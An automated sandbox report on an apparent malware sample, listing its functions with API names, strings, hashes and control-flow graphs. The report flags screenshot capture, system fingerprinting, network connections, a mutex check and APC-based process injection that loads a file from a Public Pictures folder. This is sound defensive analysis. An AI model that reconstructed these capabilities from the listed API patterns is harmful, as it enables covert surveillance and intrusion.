                          • Instruction Fuzzy Hash: 5B729B31658B588BEB69DF28C885BE973E6FF98310F28452DD88BC7151DB34EA438741
                          Function 000001CFB9396860 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 328registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Value$AllocCreateDeleteOpenSleepVirtual
                          • String ID: .$l$n
                          • API String ID: 2516758476-2376909228
                          • Opcode ID: 6efd494f1771a83e1622dba27cf1971ef9d7551aafc06c164830ee9e4ee08136
                          • Instruction ID: 72a02351d6f406a5868d53ded8a201c15091f15d206d0dbe581551cf4434322b
                          • Opcode Fuzzy Hash: 6efd494f1771a83e1622dba27cf1971ef9d7551aafc06c164830ee9e4ee08136
                          • Instruction Fuzzy Hash: 08B17F30618A888FFB64EF68D844BDA73E6FF99305F14412DA44BC7191DB78DA45CB42
                          Function 000001CFB9393390 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 264networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: connectgethostbynamesocket
                          • String ID: 0u
                          • API String ID: 1495599467-3203441087
                          • Opcode ID: 84b7b3bca6920cc8a9683eb24846bb0459563868bb5748dfd0158d2d2b471ceb
                          • Instruction ID: 45de217ebbf946f91e9b6654eb6b6cfd13ceb3ecd57e9578f84c1ab21f69001c
                          • Opcode Fuzzy Hash: 84b7b3bca6920cc8a9683eb24846bb0459563868bb5748dfd0158d2d2b471ceb
                          • Instruction Fuzzy Hash: 14917F7061CB488FE758DF28D4457AAB7E5FB98304F10492EE58BC3290DB74E906CB86
                          Function 000001CFB9608180 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 87COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DiskDriveFreeGlobalMemorySpaceStatusType
                          • String ID: %sFree%d Gb $:$@$HDD:%d
                          • API String ID: 3475944273-3501811827
                          • Opcode ID: c6b34b87c4707ce2202623c9a1da05e2d2efcd629a34194bb4d2bfd65ede8d83
                          • Instruction ID: 18d4c71dea7563c5185f50c6c05301dc768b8feb2283ec8ef6d5e54badd1a88d
                          • Opcode Fuzzy Hash: c6b34b87c4707ce2202623c9a1da05e2d2efcd629a34194bb4d2bfd65ede8d83
                          • Instruction Fuzzy Hash: 4E315C36208BC586E760DB15F840B8BB3B6F389784F90112AEACD43B29DF38C556CB00
                          Function 000001CFB9607A90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 82comCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFreeInitializeInstanceStringUninitialize
                          • String ID: FriendlyName$Network
                          • API String ID: 841178590-1437807293
                          • Opcode ID: 2c5c4b6b2c41542d4b871e72c06e1fdebbf868c540bd732ef293f0ccc01ef82e
                          • Instruction ID: 8c1c9b2d9cbb3214796f4729c2db7b76e2837bb145fb88539e8ba543d14d0627
                          • Opcode Fuzzy Hash: 2c5c4b6b2c41542d4b871e72c06e1fdebbf868c540bd732ef293f0ccc01ef82e
                          • Instruction Fuzzy Hash: FB31FF76244A8682EB50DF35E480BDA77B2F7D4F98F554026DA4E83724DF38C98ACB40
                          Function 000001CFB96089F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoSystem$AddressHandleModuleNativeProc
                          • String ID: GetNativeSystemInfo$kernel32.dll
                          • API String ID: 3433367815-192647395
                          • Opcode ID: 812c2325d0cc55593327c1f2f69d89585b164903738284ab9866f3d98fbcdec6
                          • Instruction ID: cbf47c96437ae1836900d7f85125bc04f49b7670c69516fa622c31248db68af1
                          • Opcode Fuzzy Hash: 812c2325d0cc55593327c1f2f69d89585b164903738284ab9866f3d98fbcdec6
                          • Instruction Fuzzy Hash: 9501E835655BC686EAA0AB14E89079A72B7F388740F94052AD68E42B94EF2DCB568700
                          Function 000001CFB9603680 Relevance: 7.6, APIs: 5, Instructions: 74networkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$recvselect
                          • String ID:
                          • API String ID: 4102763267-0
                          • Opcode ID: 4fd4400789ad907de071142e916aeea2107531b851bf8881d6973165b3bc5834
                          • Instruction ID: 95443252d1c682d8b4781007347c57b33325662fb46a182080bbdfba1012b7e5
                          • Opcode Fuzzy Hash: 4fd4400789ad907de071142e916aeea2107531b851bf8881d6973165b3bc5834
                          • Instruction Fuzzy Hash: C131E171244AD282FB709B25E484FDA73B3F784B89F00413ADB4947BC9EB38C9068709
                          Function 000001CFB9607420 Relevance: 7.6, APIs: 5, Instructions: 56processCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 1789362936-0
                          • Opcode ID: 1d1c4d45bde62b7eb6451df214e2b8338f83561ada536a8c26e1dbaab7acb04f
                          • Instruction ID: b4433ea2e125984ab68041f57eb7227444e2ee7afa1817518eb8c1d79b521612
                          • Opcode Fuzzy Hash: 1d1c4d45bde62b7eb6451df214e2b8338f83561ada536a8c26e1dbaab7acb04f
                          • Instruction Fuzzy Hash: 0E2187312446C286FB649B25E8947AA77B3F7D8B94F448239D999467A4EF3CCA06C700
                          Function 000001CFB9608440 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 377COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFactory
                          • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                          • API String ID: 1145517477-257307503
                          • Opcode ID: 0841caf3cacf5e98688c35e219301d40f8b2c0522cc3051f10e647fb0cbd250b
                          • Instruction ID: ab3086f3a637af00137ee86e58a6954c6ad6a4e39bfa8950ccaae4d099fcb743
                          • Opcode Fuzzy Hash: 0841caf3cacf5e98688c35e219301d40f8b2c0522cc3051f10e647fb0cbd250b
                          • Instruction Fuzzy Hash: 26E19C32750A8586FA10CB65D9847EE6373F784BE4F544629DE6E17BE8CB39CA46C300
                          Function 000001CFB96142A8 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$CreateInformationVersion
                          • String ID:
                          • API String ID: 3563531100-0
                          • Opcode ID: baa38fae55a4b4714cb9625f470aef3d5fa3ce788670dbd23bb72a12501c91c4
                          • Instruction ID: d3dd90bff7e2c6e10aedfe7ac5e24fde613155f0b61c75aa459c44fa7ffd4f75
                          • Opcode Fuzzy Hash: baa38fae55a4b4714cb9625f470aef3d5fa3ce788670dbd23bb72a12501c91c4
                          • Instruction Fuzzy Hash: 7FE06D346516D382FB846B14E805FD522B3B7A8704F80543DD94A03784DF3CCA8B8704
                          Function 000001CFB9312C89 Relevance: 2.9, APIs: 2, Instructions: 382memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9300000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                          • Instruction ID: 4bf00c6bef2d7449964654eb3a06488454d9eadb585b1ae0cb398f2a7a3a40d9
                          • Opcode Fuzzy Hash: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                          • Instruction Fuzzy Hash: 2AC163306549554BFB99DB28C8D5BEAB3E6FF98300F2C413DD45AC31A6DB20EE538681
                          Function 000001CFB960E1C0 Relevance: 34.7, APIs: 23, Instructions: 201memorywindowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 242 1cfb960e1c0-1cfb960e24a GlobalAlloc GlobalLock call 1cfb96118d0 GlobalUnlock CreateStreamOnHGlobal 245 1cfb960e250-1cfb960e2b0 call 1cfb9626448 call 1cfb9626458 call 1cfb960b6d0 242->245 246 1cfb960e4d3-1cfb960e4dc GlobalFree 242->246 256 1cfb960e2b6-1cfb960e2e3 GdipCreateBitmapFromStream 245->256 257 1cfb960e43b-1cfb960e458 245->257 247 1cfb960e4df-1cfb960e505 call 1cfb96118a0 246->247 258 1cfb960e2f0-1cfb960e30b call 1cfb960b990 GdipDisposeImage 256->258 259 1cfb960e2e5-1cfb960e2eb GdipDisposeImage 256->259 262 1cfb960e45a-1cfb960e478 DeleteObject 257->262 263 1cfb960e47e-1cfb960e491 call 1cfb9626448 257->263 258->257 266 1cfb960e311-1cfb960e32a CreateStreamOnHGlobal 258->266 259->257 262->263 269 1cfb960e493-1cfb960e4aa call 1cfb9626448 263->269 270 1cfb960e4c6-1cfb960e4cd call 1cfb9626458 263->270 266->257 268 1cfb960e330-1cfb960e339 call 1cfb960bdb0 266->268 273 1cfb960e33e-1cfb960e364 GetHGlobalFromStream GlobalLock 268->273 278 1cfb960e4b2-1cfb960e4c0 call 1cfb9626458 269->278 279 1cfb960e4ac call 1cfb9626758 269->279 270->246 276 1cfb960e366-1cfb960e385 GlobalFree call 1cfb960b790 273->276 277 1cfb960e38a-1cfb960e3e0 GlobalSize call 1cfb9611878 call 1cfb96118d0 call 1cfb960f480 call 1cfb960ad90 273->277 276->247 293 1cfb960e3e2-1cfb960e3e6 call 1cfb9611880 277->293 294 1cfb960e3eb-1cfb960e3ee 277->294 278->270 279->278 293->294 296 1cfb960e3f0-1cfb960e3f3 call 1cfb9611880 294->296 297 1cfb960e3f8-1cfb960e3ff 294->297 296->297 299 1cfb960e401-1cfb960e41f DeleteObject 297->299 300 1cfb960e425-1cfb960e435 GlobalUnlock 297->300 299->300 300->257
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$DisposeFreeFromImageLock$AllocBitmapDeleteGdiplusObjectShutdownUnlock
                          • String ID:
                          • API String ID: 562715702-0
                          • Opcode ID: 42898a941c2d68d10d428d3b7f6529fd9f89c56f0b88e70156fc75360aed880c
                          • Instruction ID: c191574f7f4df3e5ed64f1a145a7c9ac1646844faa77a0f515952d49cbafea8d
                          • Opcode Fuzzy Hash: 42898a941c2d68d10d428d3b7f6529fd9f89c56f0b88e70156fc75360aed880c
                          • Instruction Fuzzy Hash: 51A14C32744B8286FB14EF65E894BDD33B7F754B98F00452ACD5A57AA4DF38CA1A8340
                          Function 000001CFB960BDB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 225windowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 567 1cfb960bdb0-1cfb960bde0 call 1cfb960b6d0 570 1cfb960bec0 567->570 571 1cfb960bde6-1cfb960bdf6 GdipGetImageEncodersSize 567->571 572 1cfb960bec5-1cfb960bee0 call 1cfb96118a0 570->572 571->570 573 1cfb960bdfc-1cfb960be07 571->573 575 1cfb960be43-1cfb960be50 573->575 576 1cfb960be09-1cfb960be12 call 1cfb960b240 573->576 577 1cfb960be56-1cfb960be62 call 1cfb9611e40 575->577 578 1cfb960c097-1cfb960c0a1 call 1cfb9601220 575->578 586 1cfb960be40 576->586 587 1cfb960be14-1cfb960be1e 576->587 588 1cfb960be64-1cfb960be66 577->588 589 1cfb960be68-1cfb960be72 577->589 586->575 590 1cfb960be20 587->590 591 1cfb960be2a-1cfb960be3e call 1cfb961dd80 587->591 592 1cfb960be75-1cfb960be78 588->592 589->592 590->591 591->592 594 1cfb960be97-1cfb960bea7 GdipGetImageEncoders 592->594 595 1cfb960be7a-1cfb960be7d 592->595 599 1cfb960bee1-1cfb960bef1 594->599 600 1cfb960bea9-1cfb960beac 594->600 597 1cfb960be7f 595->597 598 1cfb960be90-1cfb960be95 595->598 604 1cfb960be80-1cfb960be8e call 1cfb9611e00 597->604 598->572 602 1cfb960bef3 599->602 603 1cfb960bf3a 599->603 600->570 601 1cfb960beae 600->601 605 1cfb960beb0-1cfb960bebe call 1cfb9611e00 601->605 607 1cfb960bf00-1cfb960bf17 602->607 606 1cfb960bf41-1cfb960bf54 603->606 604->598 605->570 610 1cfb960bf73-1cfb960bf75 606->610 611 1cfb960bf56-1cfb960bf61 606->611 612 1cfb960bf19-1cfb960bf24 607->612 613 1cfb960bf2a-1cfb960bf2c 607->613 617 1cfb960bf78-1cfb960bf7a 610->617 611->610 616 1cfb960bf63-1cfb960bf65 611->616 612->613 618 1cfb960bf26-1cfb960bf28 612->618 619 1cfb960bf2f-1cfb960bf31 613->619 616->617 620 1cfb960bf9a-1cfb960bfa8 617->620 621 1cfb960bf7c-1cfb960bf7f 617->621 618->619 622 1cfb960bf33-1cfb960bf38 619->622 623 1cfb960bf67-1cfb960bf71 619->623 625 1cfb960c01a-1cfb960c047 GdipCreateBitmapFromHBITMAP GdipSaveImageToStream 620->625 626 1cfb960bfaa-1cfb960bff4 GdipCreateBitmapFromScan0 GdipSaveImageToStream 620->626 621->570 624 1cfb960bf85-1cfb960bf93 call 1cfb9611e00 621->624 622->603 622->607 623->606 638 1cfb960bf95 624->638 627 1cfb960c075-1cfb960c07e GdipDisposeImage 625->627 628 1cfb960c049-1cfb960c052 GdipDisposeImage 625->628 626->627 630 1cfb960bff6-1cfb960bfff GdipDisposeImage 626->630 633 1cfb960c090-1cfb960c092 627->633 634 1cfb960c080-1cfb960c08e call 1cfb9611e00 627->634 628->570 631 1cfb960c058 628->631 630->570 635 1cfb960c005-1cfb960c013 call 1cfb9611e00 630->635 637 1cfb960c060-1cfb960c06e call 1cfb9611e00 631->637 633->572 634->633 643 1cfb960c015 635->643 645 1cfb960c070 637->645 638->570 643->570 645->570
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Gdip$Image$free$Dispose$BitmapCreateEncodersFromSaveStream$Scan0Sizemalloc
                          • String ID: &
                          • API String ID: 1890951399-3042966939
                          • Opcode ID: 55c4d5524a8ad467499d60b3f08160cb74a9a45ad6dfb88b86dca0659664e4bc
                          • Instruction ID: 238e741e00d3f4d4a58ebfea4c4d374e15d826694ef2405aaa73ea17790f5b76
                          • Opcode Fuzzy Hash: 55c4d5524a8ad467499d60b3f08160cb74a9a45ad6dfb88b86dca0659664e4bc
                          • Instruction Fuzzy Hash: 45915C323806C285FE549F31D490BE927B3EB54BD8F89863ADA19476D5EF28CE468340
                          Function 000001CFB9607F70 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 117memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion
                          • String ID: -N/$NO/$None/%s
                          • API String ID: 4155081256-3095023699
                          • Opcode ID: 937225b56d9130d735a7e5b2e703808313462ec383e8fec49d005699c9261ae8
                          • Instruction ID: 647aa311997f77c0105e2281a3747b3cc56d9bdec9ac6d2c3897c04c58fd5c7c
                          • Opcode Fuzzy Hash: 937225b56d9130d735a7e5b2e703808313462ec383e8fec49d005699c9261ae8
                          • Instruction Fuzzy Hash: 59515B31254AC386FB60EB11E8D4BD973B3F795B84F44503ADA4A02699DF39CE46C700
                          Function 000001CFB960B990 Relevance: 27.3, APIs: 18, Instructions: 283windowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 704 1cfb960b990-1cfb960b9d7 GdipGetImagePixelFormat 705 1cfb960b9d9 704->705 706 1cfb960b9de-1cfb960b9fc 704->706 705->706 707 1cfb960ba10-1cfb960ba15 706->707 708 1cfb960b9fe-1cfb960ba0c 706->708 709 1cfb960ba17-1cfb960ba28 707->709 710 1cfb960ba2c-1cfb960ba40 GdipGetImageHeight 707->710 708->707 709->710 711 1cfb960ba42 710->711 712 1cfb960ba47-1cfb960ba5e GdipGetImageWidth 710->712 711->712 713 1cfb960ba60 712->713 714 1cfb960ba65-1cfb960ba7c call 1cfb960b830 712->714 713->714 717 1cfb960bc50-1cfb960bc55 714->717 718 1cfb960ba82-1cfb960ba8a 714->718 719 1cfb960bd82-1cfb960bdaa call 1cfb96118a0 717->719 720 1cfb960ba90-1cfb960baa4 GdipGetImagePaletteSize 718->720 721 1cfb960bbcd-1cfb960bbd8 718->721 723 1cfb960baa6 720->723 724 1cfb960baab-1cfb960bab6 720->724 725 1cfb960bd01-1cfb960bd5e GdipCreateBitmapFromScan0 GdipGetImageGraphicsContext GdipDrawImageI GdipDeleteGraphics GdipDisposeImage 721->725 726 1cfb960bbde-1cfb960bc0f GdipBitmapLockBits 721->726 723->724 729 1cfb960bab8-1cfb960bac2 call 1cfb960b240 724->729 730 1cfb960baea-1cfb960baf8 724->730 727 1cfb960bd64-1cfb960bd67 725->727 731 1cfb960bc11-1cfb960bc19 726->731 732 1cfb960bc65-1cfb960bc7e 726->732 733 1cfb960bd80 727->733 734 1cfb960bd69 727->734 729->730 753 1cfb960bac4-1cfb960bacb 729->753 735 1cfb960bc5a-1cfb960bc64 call 1cfb9601220 730->735 736 1cfb960bafe-1cfb960bb0a call 1cfb9611e40 730->736 740 1cfb960bc30-1cfb960bc35 731->740 741 1cfb960bc1b 731->741 737 1cfb960bcbf-1cfb960bcd0 GdipBitmapUnlockBits 732->737 738 1cfb960bc80-1cfb960bc93 call 1cfb96132d4 732->738 733->719 742 1cfb960bd70-1cfb960bd7e call 1cfb9611e00 734->742 735->732 759 1cfb960bb11-1cfb960bb17 736->759 760 1cfb960bb0c-1cfb960bb0f 736->760 737->727 743 1cfb960bcd6-1cfb960bcdb 737->743 761 1cfb960bc95-1cfb960bc98 738->761 762 1cfb960bca9-1cfb960bcbd 738->762 740->719 748 1cfb960bc20-1cfb960bc2e call 1cfb9611e00 741->748 742->733 743->727 748->740 755 1cfb960bad7-1cfb960bae8 call 1cfb961dd80 753->755 756 1cfb960bacd 753->756 766 1cfb960bb1b-1cfb960bb1e 755->766 756->755 759->766 760->766 763 1cfb960bcf6-1cfb960bd00 call 1cfb9601220 761->763 764 1cfb960bc9a-1cfb960bc9d 761->764 762->737 762->738 763->725 767 1cfb960bc9f-1cfb960bca2 764->767 768 1cfb960bceb-1cfb960bcf5 call 1cfb9601220 764->768 770 1cfb960bb3f-1cfb960bb52 GdipGetImagePalette 766->770 771 1cfb960bb20-1cfb960bb23 766->771 767->768 775 1cfb960bca4-1cfb960bca7 767->775 768->763 773 1cfb960bb54 770->773 774 1cfb960bb59-1cfb960bb62 770->774 777 1cfb960bb35-1cfb960bb3a 771->777 778 1cfb960bb25-1cfb960bb33 call 1cfb9611e00 771->778 773->774 780 1cfb960bb68-1cfb960bb6d 774->780 781 1cfb960bc3a-1cfb960bc3d 774->781 775->762 782 1cfb960bce0-1cfb960bcea call 1cfb9601220 775->782 777->719 778->777 780->781 786 1cfb960bb73-1cfb960bb78 780->786 781->717 785 1cfb960bc3f 781->785 782->768 789 1cfb960bc40-1cfb960bc4e call 1cfb9611e00 785->789 790 1cfb960bb7a-1cfb960bb85 786->790 791 1cfb960bbbb-1cfb960bbc9 call 1cfb960c0b0 786->791 789->717 794 1cfb960bb90-1cfb960bbb9 790->794 791->721 794->791 794->794
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Gdip$Image$free$Bitmap_errno$BitsGraphicsHeapPalette$AllocContextCreateDeleteDisposeDrawErrorFormatFreeFromHeightLastLockPixelScan0SizeUnlockWidth_callnewhmallocmemcpy_s
                          • String ID:
                          • API String ID: 1886978121-0
                          • Opcode ID: 283663abc3149b5c3ebf54f6b2f35572c17daa750bb804d3607567a51a1e62ec
                          • Instruction ID: 98190e041d91f5c19b3b17df2a0bfdf86573a3a6cf66777ee89843af6beeffbe
                          • Opcode Fuzzy Hash: 283663abc3149b5c3ebf54f6b2f35572c17daa750bb804d3607567a51a1e62ec
                          • Instruction Fuzzy Hash: 29C155722406C28AFB209F35D4C4BE937B7F754B98F45852ADA1A87B85DF38CA46C740
                          Function 000001CFB96072F0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 67sleepstringsynchronizationCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateMutexSleep$ConsoleErrorHandleLastModuleWindowlstrcmplstrlen
                          • String ID: 2024. 6.19$key$open
                          • API String ID: 2230033419-3044968688
                          • Opcode ID: 99fa9ff8c4f67a4f69d89c190ec8d3bea25dab96d7079cc25afd004eccd381e5
                          • Instruction ID: 01e40f978d9ef0c80921b37cbe4f059e5142d21db0dcb39849b528eee11073fa
                          • Opcode Fuzzy Hash: 99fa9ff8c4f67a4f69d89c190ec8d3bea25dab96d7079cc25afd004eccd381e5
                          • Instruction Fuzzy Hash: 48310A31694AC782FB58AB25E895BDA33B3F794744F80943E954A425A5DF38CF4AC700
                          Function 00007FF6F6081A10 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 105injectionlibrarymemoryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6F6080000, based on PE: true
                          • Associated: 00000000.00000002.4113613717.00007FF6F6080000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6362000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F679E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff6f6080000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Process$AddressAllocCurrentHandleMemoryModuleProcQueueUserVirtualWrite
                          • String ID: C:\Users\Public\Pictures\any.png$NtTestAlert$ntdll
                          • API String ID: 373793033-3820315678
                          • Opcode ID: f246ccdc4e2d5b1fd47c438f45d2eda0d8f7f9cd1ac1eb3c950f0c355d377293
                          • Instruction ID: dee6ad3edba44f311d45edd176e3c82856bbfd40af029f2973650630b19c8af7
                          • Opcode Fuzzy Hash: f246ccdc4e2d5b1fd47c438f45d2eda0d8f7f9cd1ac1eb3c950f0c355d377293
                          • Instruction Fuzzy Hash: AF416362A18B4281EB40DB75E5443696369FF88BE0F605235EAAD53BF4EE7ED4818700
                          Function 000001CFB9607860 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 117registrystringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
